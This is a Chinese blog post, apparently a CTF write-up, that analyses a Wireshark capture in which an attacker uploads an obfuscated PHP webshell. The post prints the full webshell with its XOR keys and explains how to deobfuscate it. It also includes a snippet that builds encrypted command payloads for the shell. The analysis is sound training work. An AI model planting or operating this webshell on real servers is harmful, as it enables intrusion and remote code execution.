CTF系列之流量分析1

2021-12-22 格格屋的筆記本

##TL;DR

        距離上次原創文章好久了,持續原創更新太難了QAQ,  總是會被各種事情耽擱,其中也有自己的懶惰夾雜其中(即使是轉載,大都也是自己篩選過的一些乾貨文章)今天做題遇到個還不錯的流量分析題目,利用一點兒閒暇時間更新記錄一下。

## 正題

       題目是一個wireshark數據包分析題目,前面是sql注入流量(非本文重點),重點是攻擊者上傳了一個如下的惡意php文件

代碼如下:

<?php$B='input"),$m)=f:=f:1) {@ob_starf:t(f:);@evaf:l(@f:gzuncomf:prf:ess(@x(@basef:64_decodef:($m[f:1]),$k))f:);$o=f:@of:f:b_g';$o=str_replace('b','','crbeabbtbebb_function');$J='et_contentf:s();@ob_enf:d_cleanf:f:();$r=@bf:asef:64_f:encode(@x(@gzf:comprf:essf:($o)f:,$k));pf:rint("$p$f:kh$r$kf");}';$k='o.f:=$t{f:$i}^$k{$j}f:;}}rf:eturnf: $o;f:}iff: f:(@preg_match("/$kh(f:.+)$kff:/",@f:ff:ilf:ef:_get_contents("php:/f:f:/';$p='){$f:c=sf:trf:len($k)f:;f:f:f:$l=strlenf:($t);$o="f:";forf:($i=0;$if:<$l;){for($j=0;($j<$c&f:&$i<$lf:)f:;$j++,$i+f:+){$';$r='$k="25edf:1bcb";f:$kh="4f:23bf:0b7200ff:4";$f:kf="8f:5fc5ff71c8f:e";$f:p="nf:iGqOXD4rBhf:BWZ7t";f:funf:ctf:ion x($t,$k';$C=str_replace('f:','',$r.$p.$k.$B.$J);$I=$o('',$C);$I();?>

明顯是一段混淆的代碼,而後呢攻擊者利用這個後門執行了一些命令,而這些命令和返回的結果是加密的,所以現在需要分析這段混淆的php代碼進行解密。

首先,對代碼中的幾個變量var_dump輸出看一下

如上圖所示得知$o為creat_function,12行為匿名函數調用$C中的代碼,$C的代碼格式化一下得到如下:

發現是通過php://input傳入數據,然後需要滿足正則且匹配次數為1才往下執行。另外這裡還需要知道這幾個函數

ob_start()-打開輸出控制緩衝

ob_get_contents()-返回輸出緩衝區的內容

ob_end_clean()-清空緩衝區並關閉輸出緩衝

gzcompress()和gzuncompress()分別用於壓縮和解壓縮字符串

base64_encode()和base64_decode()分別用於base64編碼和解密字符串

還有這個自定義的x函數,其實是一個異或加密函數。

至此代碼應該讀的差不多了,那如果想要執行如phpinfo()函數,那麼需要傳入的參數是什麼呢?很簡單,通過下面的代碼即可

$evalstr = "phpinfo();";$out = base64_encode(@x(@gzcompress($evalstr),$k));echo $out;echo $p.$kh.$out.$kf;

另外,回到題目如果想要查看payload以及payload執行後的結果內容還需要進行解密,那該如何解密呢?

payload解密很簡單,如下

payload執行之後的結果該如何解密呢?其實也很簡單,主要在於x函數的逆向,因為異或加密的解密函數還是這個函數本身所以這個過程就簡單了,解密輸出如下所示:

其中變量$o為返回的數據中截取 niGqOXD4rBhBWZ7t423b0b7200f4和85fc5ff71c8e 中間的數據。

##   小結

        看似流量分析題目實則考察的是php混淆代碼分析,除此之外這個數據包分析題目還涉及到sql注入知識點,攻擊的大致流程是  基於union聯合查詢的sql注入->獲取管理員密碼->文件上傳->getshell代碼執行—>執行命令等,還是蠻綜合的一道題目,大家可以去pwnme.vip 的Incident Response下的wireshark5進行下載和練習。

##  參考文章

       https://joshuanatan.medium.com/hack-bfc7c6528463

相關焦點

  • CTF系列 1 密碼題解密網站總結(必收藏乾貨)
    unixtime.aspxhttps://tool.chinaz.com/tools/textencrypt.aspxhttps://tool.chinaz.com/js.aspxhttp://tools.jb51.net/password/zhmorsehttps://www.jb51.net/tools/morse.htmhttps://quipqiup.com(詞頻分析
  • CTF從入門到提升(三)
    ;Misc則更複雜,所有與計算機安全挑戰有關的都在其中 隱寫,圖片數據分析還原,流量,大數據,對遊戲分析逆向;A方向:PWN+Reverse+Crypto隨機搭配;都要學的內容:linux基礎、計算機組成原理、作業系統原理、網絡協議分析。
  • CTF入門指南 | 內附教程分享
    類ppc 編程類的國內外著名比賽國外:DEFCON資格賽國內:xctf聯賽 0ctf上海國內外都有,很強 入門需要哪些基礎:1.程式語言基礎(C、彙編、腳本語言)2.數學基礎(算法、密碼學)3.腦洞大開(天馬行空的想像
  • 【代碼審計】PHP代碼審計之CTF系列(3)
    ;}else{ echo "Hello.Geeker";}過程分析觀察代碼,傳遞file參數和path參數。並且path參數不能有回溯符,而file參數開頭必須是http://127.0.0.1這樣的字符串,path的參數被用作生成的文檔,而file則是寫入的內容【這是表面現象】然而,真正的寫入一句話的玄機是echo的這句話。
  • CTF工具+資源 | 插個眼
    網絡安全諮詢日常生活中的網絡安全案例解析逆向反彙編學習資料滲透測試學習資料實戰病毒分析、軟體逆向研究相關基本功知識速查工具區塊鏈相關基礎知識前言今天看到了一則安全牛的推送,比較牛的資源,保存,插眼,分享Awesome-ctf:
  • TISC 2020 CTF 題目分析及writeups
    The file is hosted at http://fqybysahpvift1nqtwywevlr7n50zdzp.ctf.sg:31080/325528f1f0a95ebbcdd78180e35e2699.zip .Flag?
  • 關鍵詞分析系列①:建立引流詞周分析模型,明確詞流量布局方向
    今天開始給各位分享的是全新的分析系列--關鍵詞分析系列,從而協助各位梳理關鍵詞層面的分析思路,首要分享的便是關於引流詞周分析模型的建立思路。本篇的實操思路主要圍繞該業3大業務場景展開:①如何分析整店關鍵詞層面的流量集中度;②如何確定整店關鍵詞未來流量布局;③如何排查關鍵詞是否完全窮盡。
  • 使用Caronte在CTF比賽中完成網絡流量分析
    關於CaronteCaronte是一款功能強大的網絡流量分析工具,可以幫助廣大研究人員在CTF比賽或其他網絡攻擊/防禦活動中對捕捉到的網絡流量進行分析
  • D3CTF-2021 d3dev 漏洞分析及復現
    最後在github上找到的一個6小時前創建的叫d3ctf-2021-pwn-d3dev的倉庫,據Readme來看應該是出題人發的,簡單的講了一下解題思路,丟了個exp,於是我也跟著分析、復現了一次,順便也寫個文章記錄一下~1.
  • CTF|玩轉RSA加密算法(一)
    1.1素數和互質數素數也稱質數,它的定義為除本身和 1 的乘積外,不能表示其他數的乘積。比如2,3,5,7,11,13,17……等都是素數。3.1 First Blood 已知p、q、e求d題目連結 : http://www.shiyanbar.com/ctf/1828題目:在一次
  • 0ctf2018 heapstorm2詳解
    題目連結https://github.com/eternalsakura/ctf_pwn/tree/master/0ctf2018
  • 虎符ctf wp
    而長度又是限定的0xe。: 127.0.0.1Content-Type:application/x-www-form-urlencodedContent-Length: {} {}""".format(len(payload),payload) final_payload = 'gopher://127.0.0.1:80/_'+quote(quote(postdata))print(final_payload)print(
  • M90/91系列OPLC明渠流量運算處理方法的研究
    1.1汙水流量的監控      環保在線監控系統由現場監測傳感器、OPLC監控裝置、中心監控軟體等構成,M90/91系列OPLC是現場監測的核心。     1.2 超聲波明渠流量計的流量計算     超聲波明渠流量計需要通過公式(1)運算,將流體的高度轉換成流體的瞬時流量,並進行累積。
  • CTF小白入門學習指南
    下面從網際網路上找到的一些資源:知乎關於CTF訓練的:https://www.zhihu.com/question/30505597入門:http://bobao.360.cn/ctf/  360的CTF訓練營www.ichunqiu.com 有線下決賽題目復現www.wechall.net/challs
  • 從零開始學財務分析:現金流量表分析
    至於此類活動是否意味著企業的現金流轉困難,則應結合企業其他一些財務指標的計算、企業當期整體的現金流量變化情況來綜合考慮。二、現金流量表比率分析1.償債能力分析償債能力是指企業到期償還債務的能力。企業舉債必須以能夠償還為前提,否則企業的生產經營會陷入危機。
  • Google CTF justintime
    所以手動將腳本中的代碼貼到相應的文件中方法 2另外還在一個師傅的github上找到了編譯好的debug 和 release版的v8 , 可以直接下載https://github.com/JeremyFetiveau/pwn-just-in-time-exploit方法 3https://github.com/google/google-ctf
  • 《親愛的熱愛的》裡面韓商言從事的ctf到底是什麼你知道麼?
    《親愛的熱愛的》這部劇熱播以後,李現扮演的男主韓商言從事的ctf這個項目也熱了起來,其實在原著裡面韓商言從事的電競指的是遊戲,並非現在改編的ctf,小說裡面韓商言是《反恐精英》又稱cs的職業選手,曾是當年CS界最有名的solo戰隊唯一投資人兼主力隊員。
  • 流量的概述系列:流量的發展史(上)
    1. 地段這一時期,通過地址位置來鎖定流量。流量來源於線下門店,位置好才能人流多,商家的競爭就在於佔領商圈、旺鋪和好地段。數據難以分析大部分情況用戶和廣告之間沒有直接的接入,偶爾通過電銷這種方式,能夠有效的衡量用戶被廣告觸達的次數,但是缺乏有效的數據以及分析平臺,比如曝光時間段,曝光次數,用戶的停留時間等等。
  • 瞻博網絡發布高級威脅防禦加密流量分析SecIntel
    通過覆蓋網絡中的更多區域,保護更多流量安全,瞻博網絡將交付威脅感知網絡的優勢性能  中國北京,2020年2月25日-提供人工智慧驅動安全網絡的領導廠商瞻博網絡(NYSE:JNPR)今天宣布就瞻博網絡高級威脅防禦(ATP)雲和SRX系列防火牆新增加密流量分析功能,同時將SecIntel集成到Mist平臺,以實現無線接入防護。
  • 關於CTF中的取證分析
    、轉存內存信息使用未受感染的乾淨程序執行取證,U盤/網絡存儲收集數據死取證關機後製作硬碟鏡像、分析鏡像(MBR、GPT、LVM)計算機取證工具主要可以分為以下幾種不同類別:磁碟和數據捕獲工具文件查看器文件分析工具註冊表分析工具網際網路分析工具電子郵件分析工具行動裝置分析工具網絡取證工具資料庫取證工具CTF中三種常見的取證場景